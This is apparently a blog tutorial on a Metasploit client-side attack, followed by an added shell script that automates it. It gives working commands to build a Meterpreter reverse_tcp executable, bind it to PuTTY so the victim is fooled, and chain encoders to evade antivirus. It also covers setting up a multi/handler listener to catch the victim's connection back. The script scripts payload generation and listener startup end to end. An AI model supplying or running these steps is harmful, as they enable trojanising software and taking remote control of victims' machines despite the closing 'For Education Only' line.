Client-side attack with Metasploit

This is a tutorial on a basic Metasploit client-side attack, using BackTrack 5 in my case.
I am going to send a payload bound to an executable file to the victim. If the victim opens the file, the payload is executed and it gives us a Meterpreter session.

Open a terminal and type

cd /pentest/exploits/framework

 

Next, follow the image (screenshot not reproduced here).

To find your WAN (public) IP address, click HERE.

I use windows/meterpreter/reverse_tcp because this payload connects back to LHOST:LPORT over TCP when it runs and gives us a Meterpreter session. That is why LHOST has to be an address the victim can reach, i.e. your WAN IP when the victim is on the internet.

Now you can see an executable file in your root folder named payload.exe. Next we have to send this executable to the victim.

I am using a FUD (fully undetectable) binder to bind the payload to another executable file.

I am using PuTTY, an SSH client, as the executable the payload is bound to, so that the victim is fooled into running what looks like a legitimate program and the anti-virus is evaded.

Next 

You can even chain several encoder passes like this (msfencode encodes the payload, it does not encrypt it):

msfpayload windows/meterpreter/reverse_tcp LHOST=your-wan-ip LPORT=4444 R \
  | msfencode -e x86/shikata_ga_nai -c 3 -t raw \
  | msfencode -e x86/fnstenv_mov -c 5 -t raw \
  | msfencode -e x86/call4_dword_xor -c 4 -t raw \
  | msfencode -e x86/countdown -c 4 -t raw \
  | msfencode -e x86/shikata_ga_nai -c 16 -t exe > /root/msfpayload.exe

It will still be detected by a few AVs, so try different combinations. To see the list of available encoders, type "msfencode -l" ("msfencode -h" shows the other options).

Or you can try hex editing the binary after encoding.

 

Next

Before sending the file to the victim, we need to set up a listener to receive the Meterpreter session. This is what catches the connection back when the victim executes the file.

So open msfconsole (just type "msfconsole" without the quotes), then type

use exploit/multi/handler

and for the payload type this

set PAYLOAD windows/meterpreter/reverse_tcp

Next

Type "ifconfig" in another terminal to find the IP address of your local interface, and in msfconsole set LHOST to that address and LPORT to 4444, the same port the payload was built with. The payload carries your WAN IP; the handler listens on the local interface behind it, so the router has to forward port 4444 to this machine.

 

Then, type

exploit
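The whole procedure above, scripted, as an added example that is not part of the original post: it wraps the msfpayload | msfencode chain from the encoding step and writes the multi/handler commands from the listener step into a resource script, so the listener starts with a single "msfconsole -r handler.rc". It assumes the BackTrack 5 era msfpayload and msfencode are on PATH; the addresses, file names and the (shortened) encoder chain are placeholders chosen here, and the checks it adds, that the payload's LHOST (WAN IP) and the handler's LHOST (LAN IP from ifconfig) are valid IPv4 addresses and that the generated .exe is not empty, are this example's own.

```sh
#!/bin/sh
# Added example, not code from the original post. Assumes the BackTrack 5 era
# msfpayload/msfencode tools are on PATH. All addresses are placeholders.

# Reject anything that is not a dotted quad with four octets in 0-255.
validate_ipv4() {
  ip="$1"
  case "$ip" in
    *[!0-9.]*|.*|*.|*..*) return 1 ;;
  esac
  n=0
  for o in $(printf '%s' "$ip" | tr '.' ' '); do
    [ "$o" -le 255 ] || return 1
    n=$((n + 1))
  done
  [ "$n" -eq 4 ]
}

# Write a resource script so the listener is started with one command
# (msfconsole -r handler.rc) instead of being typed by hand each time.
# ExitOnSession false keeps the handler up after the first session, and
# "exploit -j" backgrounds it so the console is free for "sessions -i".
# lhost is the LAN address of the listening interface (what ifconfig shows).
write_handler_rc() {
  rcfile="$1"; lhost="$2"; lport="$3"
  validate_ipv4 "$lhost" || { echo "bad handler LHOST: $lhost" >&2; return 1; }
  cat > "$rcfile" <<EOF
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j
EOF
}

# Build the executable. wan_ip is the public address the victim connects back
# to, not the LAN address; the encoder chain here is a shortened assumption.
gen_payload() {
  wan_ip="$1"; lport="$2"; out="$3"
  validate_ipv4 "$wan_ip" || { echo "bad payload LHOST: $wan_ip" >&2; return 1; }
  msfpayload windows/meterpreter/reverse_tcp LHOST="$wan_ip" LPORT="$lport" R \
    | msfencode -e x86/shikata_ga_nai -c 3 -t raw \
    | msfencode -e x86/call4_dword_xor -c 4 -t raw \
    | msfencode -e x86/shikata_ga_nai -c 16 -t exe > "$out"
  # A failed stage in the pipeline leaves a zero-byte file; catch that here
  # rather than discovering it when the victim's machine never calls back.
  [ -s "$out" ] || { echo "payload generation failed: $out is empty" >&2; return 1; }
}

# Usage: sh gen.sh <wan-ip> <lan-ip> [port]. With no arguments the script
# only defines the functions above.
if [ "$#" -ge 2 ]; then
  port="${3:-4444}"
  gen_payload "$1" "$port" /root/msfpayload.exe
  write_handler_rc /root/handler.rc "$2" "$port"
  echo "payload written to /root/msfpayload.exe; now run: msfconsole -r /root/handler.rc"
fi
```

The script deliberately takes two addresses: the payload is built with the WAN IP, because that is the only address the victim can reach, while the handler binds to the LAN address, so the same value would be wrong in at least one of the two places whenever you sit behind NAT.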

 

For Education Only….
